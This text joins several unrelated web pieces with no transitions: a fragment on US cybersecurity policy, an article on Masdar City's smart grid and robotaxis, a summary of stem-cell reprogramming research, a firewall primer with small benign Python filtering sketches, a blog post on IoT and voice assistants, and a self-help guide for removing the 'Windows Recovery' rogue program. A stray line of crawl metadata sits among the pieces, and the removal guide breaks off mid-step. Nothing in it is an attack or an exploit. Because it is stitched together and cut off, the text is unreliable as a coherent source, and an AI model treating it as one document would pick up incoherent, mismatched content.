The Obama Administration has been considering issuing an executive order to get such broad initiatives underway. Efforts to get a cybersecurity bill through Congress have to date failed, prompting Democrats to call on the White House to mandate cybersecurity protection measures for businesses and government agencies alike through an executive order. The GOP has maintained that such a step is an overstepping of government authority into the realm of private enterprise – one that will hamper competition and innovation by placing too many regulatory restraints on daily operations.
In fact, government agencies are unsure of how to secure their own infrastructure, let alone help citizens do so.
So what to do? Going forward, the GAO recommended that the FCC encourage the private sector to implement a broad, industry-defined baseline of mobile security safeguards. GAO also recommended that DHS and NIST take steps to better measure progress in raising national cybersecurity awareness. The FCC, DHS, and NIST generally concurred with GAO's recommendations.
Self-driving electric taxis, smart appliances and municipal solar power are all amenities enjoyed by the residents of the futuristic Masdar City in the Middle East. Here's how they'll make their way to the U.S.
On the outskirts of Abu Dhabi on the Persian Gulf, just southeast of Qatar and not far from Iran, a sparkling new metropolis called Masdar City is rising in the desert. The Abu Dhabi Future Energy Company began construction of Masdar in 2008, and so far the site features one major street and a few residential and research buildings in its tech institute, and it has grand intentions of becoming the first municipality powered entirely by renewable energy sources.
Americans might have expected Silicon Valley to lead such a charge, but City 2.0 is emerging halfway across the world.
In Masdar City, a personal rapid transport system buzzes passengers from one building to another in driverless "robotaxis." (The city does not allow any personal automobiles.) A solar power plant heats the city's water and provides electricity to a water treatment facility. Every electrical outlet in the city is monitored, and the total municipal power usage is reported on a water tower standing in the city center. Smart meters, connected into a smart grid, know all kinds of details about power usage -- such as when a dryer is running too long.
Designed by the British architects Foster + Partners as a showcase for sustainable architecture and engineering, the city is expected to have 40,000 residents when it's fully built in 2025. While few if any American cities have the financial equivalent of the Abu Dhabi government's deep pockets to bankroll investments in energy-saving infrastructure, some of Masdar's cutting-edge energy technologies -- smart appliances in the home, renewable energy sources, and clean, self-driving personal transit -- may be coming to a city near you. Here's how these urban technologies are evolving in the United States.
The dishwasher in your kitchen is not that smart. Sure, some models let you program a wash cycle for late at night when electricity rates are low. But they can't read and respond intelligently to your electric meter -- a capability that would make it possible to, for instance, have them automatically turn on when the rates during the day are at their lowest.
One of the key problems, says John Millberg, an energy manager with the Minneapolis city government, is that many utilities don't offer tiered cost structures during the day. So even if homes were equipped with smart appliances and smart meters, there would be no incentive to do more to manage power usage than choosing between running appliances during the day or at night. Moving to a tiered structure would require a mandate from the city's public utilities commission, he says.
Texas and California are two states that do have tiered pricing. That's why Texas-based Reliant Energy started a pilot program with a few General Electric employees in Houston to try out smart appliances. Each test appliance -- including water heaters, dishwashers and clothes dryers -- has a communications module that uses the ZigBee wireless protocol, says Wayne Morrison, the manager of smart energy partnerships at Reliant, who is in charge of the pilot. The modules connect to a smart meter that reports exact usage back to the utility in real time.
If the customer allows it, the utility can automatically send a command to the appliance to run during a specific time of the day, Morrison says. (Of course, appliances have to be prepped for the automatic schedule with soap and dishes -- at least until we all have robomaids.) Reliant offers pilot customers a Web portal where they can see how much energy they used during the day and view reports about usage over a few days or weeks. The company also sends emails to let them know about their energy savings.
In the next decade, smart appliances will be able to send diagnostic information to the utility and even send a message to a repair technicians automatically, says Morrison. Some of the latest home appliances, like the Samsung RSG309 Wi-Fi Refrigerator, can use Wi-Fi over home routers today, but future models could tap into the grid directly, he says. For now, they can run apps in a touchscreen display to show things like weather forecasts, schedules of upcoming family events or recipes.
John H. Desmarais, a development manager at GE, says smart appliances can reduce energy use in a home by up to 20%. And appliances are just the start, he says: Once the U.S. adopts a widespread "smart grid" that lets utilities and homeowners access heating and cooling systems remotely, a smart thermostat, tied into the smart grid, could reduce energy use even more, since cooling and heating are responsible for 28% of home energy use.
Desmarais envisions a day when every device in the home will connect to a smart grid. GE has developed a software platform for home energy management called Nucleus that's designed to plug into the smart grid of the future. The grid is not widespread yet, but in the meantime, there are products that take advantage of existing technologies to give people more control over when their appliances run and when they don't. For example, a company called Nest Labs offers a smart thermostat that connects to your home Wi-Fi network and lets you adjust temperature settings using an iPhone or schedule automatic temperature increases or decreases via the Web.
In the home of the future, the smart grid may connect to your appliances, your lights, your air conditioning system and the electric car in your garage. Credit: General Electric.
Unlike in Masdar -- a newly constructed metropolis where a smart grid can be implemented by fiat -- adoption of smart appliances in the U.S. likely faces a tough road, says Bob Gohn, an analyst at Pike Research. "There are a number of pieces of the puzzle that have to come together before smart appliances make sense from an energy perspective," he says -- standards need to be approved, utilities need to create tiered pricing plans, and smart meter technology needs to evolve.
The big hurdle, he says, is that a smart appliance has to integrate into a home's smart grid, called a home area network (HAN). The ZigBee standard ran into a roadblock in 2009, says Gohn, because the first iterations used a proprietary protocol, not the more standard TCP/IP.
Lately, Gohn says, ZigBee has started to adhere to standards like those being developed by the National Institute of Standards and Technology that govern smart grid device interoperability and power use. The Smart Energy Profile 2.0, a set of TCP/IP-compliant standards developed by ZigBee for controlling and monitoring water and energy use in the home, is nearing approval, but Gohn says compatible devices won't be available until 2013.
Another factor holding back the adoption of smart appliances and smart grids is what Gohn and other industry watchers call the "Bakersfield effect" -- distrust of smart meters by consumers and consumer advocates. In 2009, the California utility Pacific Gas and Electric (PG&E) conducted a pilot test of smart meters in Bakersfield, Calif., during which a perfect storm of rate increases, record temperatures and other factors caused utility bills to go way up, not down. As a result, state legislators blocked future smart grid deployments temporarily, although some California cities including San Francisco are now starting to deploy them.
Ironically, says Gohn, later analysis showed that the smart meters did track power usage more effectively. The problem, he explains, is that the new meters are extremely accurate. Older meters tend to fudge how much energy a home is using, to the advantage of the homeowner. But replacing them is better for the environment, because they more accurately reflect your energy usage and can show you where to make adjustments to reduce your energy consumption (for example, by suggesting that you turn down the heat at night). And if you do make such adjustments, they could ultimately lower your energy costs, even if your costs go up initially.
Eventually homeowners and municipalities will see the value of smart meters, says Gohn. He predicts that smart appliances will become popular by 2014, at which point adoption rates will begin to grow by 40% to 50% per year.
Personal, autonomously driven rapid transport
In late June 2011, the state of Nevada passed a law that would allow driverless cars on its roads, pending the Department of Motor Vehicles' development of regulations governing how the cars should operate on public highways. Those regulations were approved in February.
California looks to be headed in the same direction: The state senate in May approved a bill that would establish standards governing autonomously operated vehicles. Other states, including Arizona, Hawaii, Florida and Oklahoma, are considering similar legislation, according to the Los Angeles Times.
Already, Google has put specially outfitted self-driving Toyota Prius models through test drives that covered 140,000 miles in northern California. A driver was always on hand to take over during the test drives, and there was only one minor fender-bender during the pilot, and it was caused by human error. Autonomous driving could cut the number of accidents in half, says Sebastian Thrun, a Google engineer.
Of course, having one car drive you to work is one thing. In Masdar City, thousands of people ride in autonomous cabs that run on electric power and read markers on the road for navigation. There is no need for remote charging stations, because the cabs power up at a car terminal while waiting for people to load. There are now 10 taxis in operation, carrying about 25,000 passengers per month, according to 2GetThere, the company that developed the Masdar City robotaxis.
Robotaxis transport about 25,000 people per month in Masdar City. There are currently 10 vehicles in the fleet. Credit: 2GetThere.
There have been no reported accidents since the Masdar City taxis launched in December 2010, according to 2GetThere spokesman Robbert Lohmann, who says autonomous cars for public transit make sense in Masdar City because the road infrastructure is dedicated to the driverless cabs. "The chances of two vehicles coming into contact with each other are extremely remote," he says. "The predictable behavior of automated systems ensures that the random character of accidents as we experience them with manually driven vehicles, such as personal cars or trains, will be avoided."
What about on U.S. roads at highway speeds? Marcial Hernandez, a senior engineer at automaker Volkswagen, says the sensor technology needed for autonomous cars on highways is already available. Many cars can sense when another vehicle passes or automatically slow down to maintain a proper distance from the vehicle ahead of you on the highway (thanks to a technology called adaptive cruise control). A few models, like the Infiniti G, can nudge you back into a lane when your car gets too close to the shoulder.
In a recent research project, Hernandez says, VW developed a feature called Temporary Auto Pilot that uses such sensors and also controls steering. And Cadillac says it's road-testing a similar technology called Super Cruise that allows the driver to take his or her hands off the wheel for short periods of autonomous highway driving.
With Cadillac's Super Cruise technology, the car watches lane markings on the highway to control your speed and position in the lane for hands-free driving. Credit: Cadillac.
These features require advanced LIDAR (Light Detection and Ranging) sensors, which are sensitive enough to detect curbs and small objects, Hernandez explains. Often found in luxury cars today, LIDAR is still too expensive to be included in many low-end vehicles, Hernandez says. That's changing quickly, though; some lower-cost vehicles, such as the Ford Taurus, are equipped with LIDAR. But until every car uses the technology, it may be hard for autonomous driving to gain traction.
Another issue hindering the adoption of driverless cars in the U.S., Hernandez says, is that the traffic infrastructure is not yet ready. A driverless car could speed down the highway, but today it wouldn't know a simple condition such as whether a traffic light is green or red, or if a parking space is available at the mall. For robotaxis to be viable, a city would need to build a wireless infrastructure that communicates all of this information to the cars.
"The biggest problem is that robotaxis require infrastructure investments and changes to create a reliable foundation," says Thilo Koslowski, an auto industry analyst at Gartner, who says U.S. consumers are in favor of autonomous cars. "Ideally, autonomous vehicles will be connected 24/7 with traffic management networks to optimize routing and congestion levels. These cars can also function as traffic probes to collect speed and congestion information."
The National Highway Traffic Safety Administration (NHTSA) is taking some initial steps toward building more-connected roadways. It will conduct a yearlong test of vehicle-to-vehicle communications technology in Ann Arbor, Mich., starting this fall. Test cars will connect to each other and to the road to be alerted to imminent crash situations, construction zones and more. The use of such wireless communications systems could lead to an 80% reduction in accidents, according to the NHTSA.
Embryonic stem cells (ESCs) have the potential to develop into any tissue, and thus hold promise for repair of damaged organs. Part of that potential comes from being a perfect tissue match to the person in need of repair, but this assumes that ESCs can be made from adults, which currently requires a process that's disturbingly close to human cloning. The alternatives, however, are also problematic. Human ESCs exist, but they will not be perfect matches to patients, and there are restrictions on working with them while using government funding, as well as some ethical concerns regarding their creation. Although adult stem cells exist, they are partly specified, and may not be able to form every tissue that needs repair. In addition, some adult stem cells exist in small populations that reside in hard-to-reach locations—nobody's going to dig around in the heart or interior of the brain of a patient in order to pull out a few stem cells.
In an ideal world, we'd simply convert cells from adult patients directly into stem cells without doing anything resembling cloning along the way. Working in mouse cells, a pair of researchers from Kyoto have apparently done just that. The researchers built on the extensive characterization of stem cells, both human and mouse, that has been performed recently. They first dropped a drug resistance gene into a locus that's expressed in ESCs, so that when cells were cultured with the drug, only those with ESC-like gene expression would survive. Next, they scanned the literature for any gene that is expressed in ESCs, and chose a panel of 24 genes that were known regulators of stem cell formation or embryonic development.
They first introduced these genes individually into mouse cells, but none of the resulting lines were drug resistant. Dumping all 24 in at once, however, produced multiple cell lines, several of which appeared to be ESCs by a number of assays. The scientists then went through and eliminated one gene at a time from the pool, whittling it down to 10 genes. They repeated this Survivor-like process with the pool of 10, and eventually came up with four genes: Oct3/4, Klf4, Sox2, and c-Myc. Transfection of mouse cells with these four was sufficient to convert them to ESCs.
Gene expression analysis using DNA chips showed that the resulting cells were most similar to ESCs, and no longer resembled the parental cell line. In a number of culture systems, the cells could form a huge range of adult cell types, and could form embryoid bodies when injected into adult mice. But the key test came when they labelled these ESCs with a fluorescent tag and injected them into recently fertilized mouse embryos at a time when the embryos were a small cluster of cells. The progeny of the engineered ESCs glowed green, and were found in every tissue in these embryos as they developed, as well as throughout adults. There seems to be little that's different between regular ESCs and the engineered ESCs.
There are still some questions as to what exactly is going on with these cells. The efficiency of conversion to ESCs is very low, but it is unclear what limits it. A second question is why, if these cells still carried the extra copies of these four genes, they could ever differentiate into normal cells. Shouldn't they remain ESCs? The technique is also not ready for use in humans, and not only because it hasn't been tried with human cells. The method used to introduce the genes relied on retroviruses that insert randomly into the genome—not generally a safe technique. Still, this appears to be an important first step, and you can bet that many labs will be interested in following up on these results.
Enterprise Perimeter Security and Firewall Systems
The perimeter of the enterprise and the first line of defense, firewall systems, are vital to the security of any business. The perimeter of the enterprise establishes the boundary between the inside of the business and the outside. While businesses are vulnerable to insider and outsider threats—both of which are significant—the enterprise perimeter and the firewall system are designed to protect the inside from outsider attacks.
So how do you secure your internal network from an external network, such as the Internet? One potential solution is to set up a firewall system. A firewall is designed to keep intruders from getting into your internal network.
A firewall is one or more systems, which may be a combination of hardware and software, that serve as a security mechanism to prevent unauthorized access between trusted and untrusted networks.
Firewall systems are typically the first line of defense between an organization’s internal network and its connection to the Internet, and they are the primary tool used to enforce an organization’s security policy by preventing unauthorized access between networks. An organization may choose to deploy one or more systems that function as firewalls.
A firewall is a gateway that restricts the flow of information between the external Internet and the internal network. The trusted internal network may include several LAN and WAN subnets; the firewall is the system (or set of systems) that separates this autonomous network from the external network. Firewalls may be internal or external.
Firewall systems can protect against attacks that pass through network interfaces. Firewall systems cannot protect against attacks that do not pass through the firewall.
For example, consider an organization’s internal network, which may include several LAN and WAN subnets. The WAN subnets may be used to provide connectivity to the corporate network. Thus, technologies such as frame relay, ISDN or dedicated point-to-point circuits (56 kbps, fractional T-1, T-1, T-3) may be used to provide connectivity between branch offices and the corporate network. If access to the Internet is through a router on the corporate network and that is where the firewall system architecture is defined, it is possible for the firewall system to control inbound and outbound access to the Internet on the basis of filters (rules) that have been defined.
Types of Firewalls
There are several types of firewall systems. These include:
- Packet-filtering firewalls
- Stateful-inspection firewalls
- Application-proxy gateway firewalls
A packet-filter firewall is a lower-layer firewall device that includes access-control functionality for system addresses and communication sessions. An example of a packet-filtering firewall system is a boundary router. This typically is deployed on the “edge” of the enterprise network. Its advantages are that it is fast and flexible. It can filter out unwanted protocols, perform simple access control and then pass data to other, more advanced firewalls.
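To make the rule-based behavior concrete, here is a minimal, illustrative sketch in Python. It is not tied to any particular firewall product and the rule fields are simplified: the filter walks an ordered rule list and applies the first match, with an implicit deny if nothing matches.

    from dataclasses import dataclass
    from typing import Optional

    @dataclass
    class Rule:
        action: str              # "permit" or "deny"
        protocol: str            # "tcp", "udp", or "any"
        dst_port: Optional[int]  # None matches any destination port

    def filter_packet(rules, protocol, dst_port):
        """Return the action of the first matching rule; deny by default."""
        for rule in rules:
            if rule.protocol not in ("any", protocol):
                continue
            if rule.dst_port is not None and rule.dst_port != dst_port:
                continue
            return rule.action
        return "deny"  # implicit deny-all when no rule matches

    # Example: permit inbound web traffic only.
    rules = [Rule("permit", "tcp", 80), Rule("permit", "tcp", 443)]
    print(filter_packet(rules, "tcp", 443))  # permit
    print(filter_packet(rules, "udp", 53))   # deny

Real packet filters also match on source and destination addresses, but the first-match-wins evaluation shown here is the core idea.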
Stateful-inspection firewalls represent a superset of packet-filter firewall functionality. These firewalls can interpret and analyze the information in layer-four (transport layer) headers. The firewall builds a state table of outbound TCP connections along with each session’s “high-numbered” client port, and this state information is used to validate any inbound traffic.
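As an illustration of the state table described above (again a simplified Python sketch, not a production design), the firewall records each outbound connection and admits inbound packets only when they correspond to a tracked session:

    # Track outbound TCP sessions as (src_ip, src_port, dst_ip, dst_port) tuples.
    outbound_sessions = set()

    def record_outbound(src_ip, src_port, dst_ip, dst_port):
        outbound_sessions.add((src_ip, src_port, dst_ip, dst_port))

    def allow_inbound(src_ip, src_port, dst_ip, dst_port):
        # Inbound traffic is valid only if it is the reverse of a tracked session.
        return (dst_ip, dst_port, src_ip, src_port) in outbound_sessions

    record_outbound("10.0.0.5", 49152, "192.0.2.10", 443)        # client opens HTTPS
    print(allow_inbound("192.0.2.10", 443, "10.0.0.5", 49152))   # True: reply traffic
    print(allow_inbound("198.51.100.7", 443, "10.0.0.5", 49152)) # False: unsolicited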
Application-proxy gateway firewalls are highly advanced firewalls that combine the capabilities of access control provided at the lower layers with application layer functionality. Typically, these have extensive logging capabilities and can authenticate users directly. These devices are less vulnerable to spoofing attacks.
Firewall systems sometimes provide an organization with centralized control in today’s highly decentralized computing environment. This implies that security tools for logging events, auditing transactions and defining alarms for threats detected can all be defined and controlled centrally as a part of the firewall system.
In large, multifaceted organizations that are made up of more or less “independent” subsidiaries, centralized firewall controls may not be in place. Rapid consolidation of some businesses has been facilitated by continual merger-and-acquisition activity. This has left some large organizations with numerous connections to external data communications networks, each having some level of firewall infrastructure, yet without effective coordination. This presents such organizations with a significant risk—consider the “hacker” saying, “You have to plug every real and probable hole across your organization, but I only need to find and exploit one to win.”
Also, keep in mind that a firewall infrastructure must perform an incredibly difficult task. Remember when we said above that “A firewall is designed to keep intruders from getting into your internal network”? That is absolutely true. The problem is that firewalls must also pass data traffic.
At the traffic flow—or network—level, all communications tend to look the same. Consider, for example, the standard TCP/IP session that consists of the three-way handshaking process, transfer of data and then the session teardown. Many modern firewalls can be configured to disallow session initiation from one or another side of the network boundary layer.
Some firewalls can also detect and drop (or reject/deny) malicious attempts to send “mid-session” TCP/IP frames into a network from the outside. (This technique can be used to help map the resources that are available inside your network.)
Other firewall infrastructures may sometimes include programs called “proxies” that accept traffic destined for “the other side of the firewall” and examine the higher-level details of specific application communications and then either pass valid traffic along to the intended destination or drop (or reject/deny) malicious or otherwise inappropriate activity.
Risk-conscious companies are installing systems that are able to identify a wide range of malicious activities. The systems react by initiating actions that will help employees effectively deal with the threat. Today’s firewall systems protect sites from vulnerabilities in the TCP/IP protocol suite. They are also able to integrate capabilities that can not only provide access control on TCP/IP packets, but also filter the content of traffic entering or leaving the enterprise.
Some examples of firewall vendors include Check Point, Cisco and SonicWALL. Firewall systems require expert knowledge to implement and configure. Most security certification programs, as well as those offered specifically by firewall vendors, include training designed to acquire skills to deploy firewalls successfully.
Each organization must defend its perimeter—its connections with the outside world. Firewall systems are the first line of defense. The design of the firewall system architecture, the selection of the firewall solution that meets your enterprise requirements and the configuration and management of the system will be critical to “close and lock” entry and exit points.
Security is only as strong as the weakest link—firewall systems can help make your enterprise security architecture a lot more formidable at the perimeter.
Uday O. Ali Pabrai, CEO of ecfirst.com, created the CIW program and is the co-creator of the Security Certified Program (www.securitycertified.net). Pabrai is also vice-chair of CompTIA’s Security+ and i-Net+ programs and recently launched the HIPAA Academy. E-mail him at email@example.com. | <urn:uuid:a5cc45e4-cba9-43ef-a7f0-79d116196529> | CC-MAIN-2017-09 | http://certmag.com/enterprise-perimeter-security-and-firewall-systems/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00047-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.930395 | 1,521 | 3.03125 | 3 |
Technology Frontiers – IoT and Voice Recognition
We previously wrote about some of the technology frontiers we are exploring, and described three that are exciting:
- 3D Printing
- Clustered Computing
- Latest Applications, Operating Systems, and Devices
But much like exploring a new area untouched before, we have two more that are both exciting and showing real promise for the future of technology and how it affects our lives. These are the Internet of Things (IoT) and Voice Recognition, especially when paired with artificial intelligence and machine learning. We describe both of these in this article.
Internet of Things (IoT)
The Internet was originally an environment where we hooked our computers up to an Internet provider and started using email or the World Wide Web (WWW). Humans were clicking links, watching videos, and sending emails. We initiated the majority of traffic by our explicit and direct actions, predominantly in a web browser.
But the use of the Internet as a super-highway for information has changed: now devices and things are generating most of the traffic that is zipping through our data lines. In fact, Cisco did a study that estimated that “Data created by IoT devices will hit 507.5 ZB per year by 2019, up from 134.5 ZB in 2014.” (source: ZdNet Article: http://www.zdnet.com/article/cloud-traffic-to-surge-courtesy-of-iot-says-cisco/). In case you are wondering, a “ZB” is a zettabyte, or 1 billion terabytes – and that is a lot!
So what is the Internet of Things (hereafter abbreviated “IoT”)? It is the accumulation of the devices that are connected to the internet and generating (and sending) or receiving data. It is sometimes analogous to Machine to Machine communication (M2M, no humans involved). Some examples:
- Your cell phones’ GPS coordinates while you are using maps
- A Nest thermostat in your home that you can connect to and raise the temperature, and which “learns” your life’s patterns to automatically start managing the system based on your history.
- A location based tracking beacon to show you where your keys were left behind.
- Public trash cans that use real-time data collection and alerts to let municipal services know when a bin needs to be emptied.
- Wireless sensors embedded within concrete foundations to ensure the integrity of a structure; these sensors provide load and event monitoring both during and after construction.
- Activity sensors placed on an elderly loved one that monitor daily routines and give peace of mind for their safety by alerting you to any serious disruptions detected in their normal schedule.
- And so many more…
In every case it is some device that is communicating data, not a person directly doing so.
Based on the utility as well as the total data being collected, we can quickly see where this can explode. Instead of you personally collecting and transmitting data, a device will do this for you. It is in effect what everybody dreams about when you think that your refrigerator will send a list to the local grocery store for items to replenish (and by the way Amazon now offers a “Dash button” that is designed to order some common household items at the push of a button).
Voice Recognition
We are using voice recognition more and more every day, in applications like Apple Siri or Google Now, or when we call into an automated messaging attendant at an insurance company and say our date of birth or policy # to a computer, or use voice-to-text capabilities. You have likely used one of these recently, but never really thought about it. It has become commonplace, and is expanding into a preferred option for interacting with data.
Like most people, I interact with a lot of email; usually between 100 and 200 legitimate emails per day that are critical. Although I am sitting at a PC, I tend to grab my iPhone and use the microphone key to answer emails using my voice. A quick press and I am orally stating my response, or sending a new email. I also use Dragon products on both Windows and Macintosh OSX to generate larger documents. In fact, this article is about 95% voice generated on a Windows laptop with Dragon NaturallySpeaking. I use it to dictate the text, select text and apply formatting like bold or italics, and other advanced capabilities. I confess that I do not type very well (if only I would have joined the mostly female typing class in my high school!), so the ability to use my voice is a tremendous advantage. It is not only a convenience; it is a huge productivity boost; I have generated documents of thousands of words in an afternoon.
And while I love the ability to simply state my words and see them appear in an email or Word document, when voice recognition is combined with artificial intelligence such as Siri or Microsoft Cortana, it becomes a truly personal digital assistant – one that knows what I am looking for. Here are some examples.
- On my iPhone, I long press the home button and Siri pops up, and I say “When do the Cleveland Browns play?”, and Siri responds orally and on screen with the opponent and date/time of the next game.
- On my Windows 10 PC I ask the same question and Cortana (the Microsoft voice persona) answers the same basic info, but on screen she also shows the probability of victory for the Pittsburgh Steelers at a 70.2% chance today :(. And by the way, Cortana has been 140-84 through 16 NFL weeks.
- On my Windows PC, I can ask “what documents did I work on today?” with my voice, and see a list of everything.
- On my iPad, I can ask “What is my schedule tomorrow?” and see and hear a list of my appointments.
- On almost any device, I can ask, “what is the temperature over the next 3 days?” and get a nice forecast for the next three days (it is getting colder…brrr…).
- On my iPhone, I long press the home button, and say “Remind me to let the dogs in in 10 minutes” and a reminder is created that dutifully goes off 10 minutes later.
- On my Android tablet I say “Ok Google”. Then “email to John Smith”, “subject Client X need”, “Message We need to call them back today” and it sends an email with that info to John on my team.
In other words, I can ask questions that are personal to me (what is my schedule?) or from my world (“what is the temperature over the next three days?”) and get a context specific reply. Or I can give instructions to do something I need (“remind me in 10 minutes to let the dogs in”). It seems like I am asking a human who knows what I want, and they give me a reply that is appropriate for the context in which I asked.
These functions are easy to use, and I highly recommend that you try them out. If you want a place to start, try one of the following:
- On your Windows 10 PC, click the Cortana microphone and say “Help Me Cortana”; she will show a list of suggested capabilities to get you started.
- Try the same thing on your iPhone: hold down the home button until it responds, and say “Help me Siri” to get a list of suggested actions (you can also configure it to respond to “Hey Siri”).
- On an Android device, try saying “Ok Google”, then say “help”
What you can see is that your devices can interact with you on your terms. It is not perfect; sometimes we see the famous and usually funny (and sometimes embarrassing) auto-correct responses when we use our voice, but overall it is really working quite well.
Summary of Technology Frontiers
There are waves of technology shifts that represent new frontiers for users and business organizations, and each raises some questions: What is this? How can it help me? What are the risks? We are looking at these so you know we have an eye on what may make a difference for you!
This week, some of us from Keystone will be at the Consumer Electronics Show (CES) in Las Vegas, which is the largest expo of technology directed at consumers and organizations that serve them. We are excited to continue to dig in and see what is coming down the road that will affect all of our lives!
Windows Recovery is a fake computer analysis and optimization program that displays fake information in order to scare you into believing that there is an issue with your computer. Windows Recovery is installed via Trojans that display false error messages and security warnings on the infected computer. These messages will state that there is something wrong with your computer's hard drive and then suggest that you download and install a program that can fix the problem. When you click on one of these alerts, Windows Recovery will automatically be downloaded and installed onto your computer.
Once installed, Windows Recovery will be configured to start automatically when you login to Windows. Once started, it will display numerous error messages when you attempt to launch programs or delete files. Windows Recovery will then prompt you to scan your computer, and the scan will find a variety of errors that it states it cannot fix until you purchase the program. When you use the so-called defragment tool, it will state that it needs to run in Safe Mode and then show a fake Safe Mode background that pretends to defrag your computer. As this program is a scam, do not be scared into purchasing it when you see its alerts.
To further make it seem like your computer is not operating correctly, Windows Recovery will also make it so that certain folders on your computer display no contents. When opening these folders, such as C:\Windows\System32\ or various drive letters, instead of seeing the normal list of files it will instead display a different folder's contents or make it appear as if the folder is empty. This is done to make it seem like there is corruption on your hard drive that is causing your files to not be displayed. It does this by adding the +H, or hidden, attribute to all of your files, which causes your files to become hidden. It will then change your Windows settings so that you cannot view hidden and system files. Once the rogue's processes are terminated you can enable the setting to view hidden files, and thus be able to see your files and folders again, by following the instructions in this tutorial:
Windows Recovery also attempts to make it so you cannot run any programs on your computer. If you attempt to launch a program it will terminate it and state that the program or hard drive is corrupted. It does this to protect itself from anti-virus programs you may attempt to run and to make your computer unusable so that you will be further tempted to purchase the rogue. The messages that you will see when you attempt run a program are:
Hard Drive Failure
The system has detected a problem with one or more installed IDE / SATA hard disks. It is recommended that you restart the system.
An error occurred while reading system files. Run a system diagnostic utility to check your hard disk drive for errors.
Hard drive critical error. Run a system diagnostic utility to check your hard disk drive for errors. Windows can't find hard disk space. Hard drive error.
After you close this alert you will be presented with another alert that pretends to be for a program that will attempt to fix your hard drive.
Windows Recovery Diagnostics will scan the system to identify performance problems.
Start or Cancel
If you press the Start button, it will pretend to scan your computer and then state that there is something wrong with it. This message is:
Windows Recovery Diagnostics
Windows detected a hard disk error.
A problem with the hard drive sectors has been detected. It is recommended to download the following sertified <sic> software to fix the detected hard drive problems. Do you want to download recommended software?
These are just further alerts trying to make you think your computer has a serious hard drive problem. It should be noted that if you attempt to run a program enough times it will eventually work.
When you perform the scan or use the fake Windows Recovery it will state that there are numerous problems on your computer, but that you first need to purchase it before it can fix any of them. Some examples of the fake problems it detects on your computer are:
Requested registry access is not allowed. Registry defragmentation required
Read time of hard drive clusters less than 500 ms
32% of HDD space is unreadable
Bad sectors on hard drive or damaged file allocation table
GPU RAM temperature is critically high. Urgent RAM memory optimization is required to prevent system crash
Drive C initializing error
Ram Temperature is 83 C. Optimization is required for normal operation.
Hard drive doesn't respond to system commands
Data Safety Problem. System integrity is at risk.
Registry Error - Critical Error
While Windows Recovery is running it will also display fake alerts from your Windows taskbar. These alerts are designed to further scare you into thinking that your computer has an imminent hardware failure. The text of some of the alerts you may see includes:
Damaged hard drive clusters detected. Private data is at risk.
Hard Drive not found. Missing hard drive.
RAM memory usage is critically high. RAM memory failure.
Windows can't find hard disk space. Hard drive error
Windows was unable to save all the data for the file \System32\496A8300. The data has been lost. This error may be caused by a failure of your computer hardware.
A critical error has occurred while indexing data stored on hard drive. System restart required.
The system has been restored after a critical error. Data integrity and hard drive integrity verification required.
Windows Recovery Activation
Advanced module activation required to fix detected errors and performance issues. Please purchase Advanced Module license to activate this software and enable all features.
Low Disk Space
You are running very low disk space on Local Disk (C:).
Windows - No Disk
Exception Processing Message 0x0000013
Just like the fake corruption messages and fake scan results, these alerts are only designed to scare you into purchasing the program.
As you can see, the warnings issued by this program are all fake, and once you realize that, the alerts become more of a nuisance than a concern. Therefore, do not purchase Windows Recovery for any reason, and if you already have, please contact your credit card company and state that the program is a computer infection and a scam and that you would like to dispute the charge. To remove this infection and related malware, please follow the steps in the guide below.
Self Help Guide
- Print out these instructions as we may need to close every window that is open later in the fix.
- It is possible that the infection you are trying to remove will not allow you to download files on the infected computer. If this is the case, then you will need to download the files requested in this guide on another computer and then transfer them to the infected computer. You can transfer the files via a CD/DVD, external drive, or USB flash drive.
- Before we can do anything we must first end the processes that belong to Windows Recovery so that it does not interfere with the cleaning procedure. To do this, please download RKill to your desktop from the following link.
RKill Download Link - (Download page will open in a new tab or browser window.)
When at the download page, click on the Download Now button labeled iExplore.exe download link. When you are prompted where to save it, please save it on your desktop.
- Once it is downloaded, double-click on the iExplore.exe icon in order to automatically attempt to stop any processes associated with Windows Recovery and other rogue programs. If you cannot find the iExplore.exe icon that you downloaded, you can also execute the program by doing the following steps based on your version of Windows:
For Windows 7 and Windows Vista, click on the Start button and then in the search field enter %userprofile%\desktop\iexplore.exe and then press the Enter key on your keyboard. If Windows prompts you to allow it to run, please allow it to do so.
For Windows XP, click on the Start button and then click on the Run menu option. In the Open: field enter %userprofile%\desktop\iexplore.exe and press the OK button. If Windows prompts you to allow it to run, please allow it to do so.
Please be patient while the program looks for various malware programs and ends them. When it has finished, the black window will automatically close and you can continue with the next step. If you get a message that RKill is an infection, do not be concerned. This message is just a fake warning given by Windows Recovery when it terminates programs that may potentially remove it. If you run into these infection warnings that close RKill, a trick is to leave the warning on the screen and then run RKill again. By not closing the warning, you will typically be able to bypass the malware trying to protect itself, so that RKill can terminate Windows Recovery. So, please try running RKill until the malware is no longer running. You will then be able to proceed with the rest of the guide. If you continue having problems running RKill, you can download the other renamed versions of RKill from the rkill download page. All of the files are renamed copies of RKill, which you can try instead. Please note that the download page will open in a new browser window or tab.
Do not reboot your computer after running RKill as the malware programs will start again.
- At this point you should download Malwarebytes Anti-Malware, or MBAM, to scan your computer for any infections or adware that may be present. Please download Malwarebytes from the following location and save it to your desktop:
Malwarebytes Anti-Malware Download Link (Download page will open in a new window)
- Once downloaded, close all programs and Windows on your computer, including this one.
- Double-click on the icon on your desktop named mb3-setup-1878.1878-220.127.116.119.exe.
This will start the installation of MBAM onto your computer.
- When the installation begins, keep following the prompts in order to continue with the installation process. Do not make any changes to default settings and when the program has finished installing, make sure you leave Launch Malwarebytes Anti-Malware checked. Then click on the Finish button. If Malwarebytes prompts you to reboot, please do not do so.
- MBAM will now start and you will be at the main screen as shown below. Please click on the Scan Now button to start the scan. If there is an update available for Malwarebytes it will automatically download and install it before performing the scan.
- MBAM will now start scanning your computer for malware. This process can take quite a while, so we suggest you do something else and periodically check on the status of the scan to see when it is finished.
- When MBAM is finished scanning it will display a screen that shows any malware that it has detected. Please note that the infections found may be different from what is shown in the image below due to the guide being updated for newer versions of MBAM.
You should now click on the Remove Selected button to remove all the selected malware. MBAM will now delete all of the files and registry keys and add them to the program's quarantine. When removing the files, MBAM may require a reboot in order to remove some of them. If it displays a message stating that it needs to reboot, please allow it to do so. Once your computer has rebooted, and you are logged in, please continue with the rest of the steps.
- You can now exit the MBAM program.
- This infection family will also hide all the files on your computer from being seen. To make your files visible again, please download the following program to your desktop:
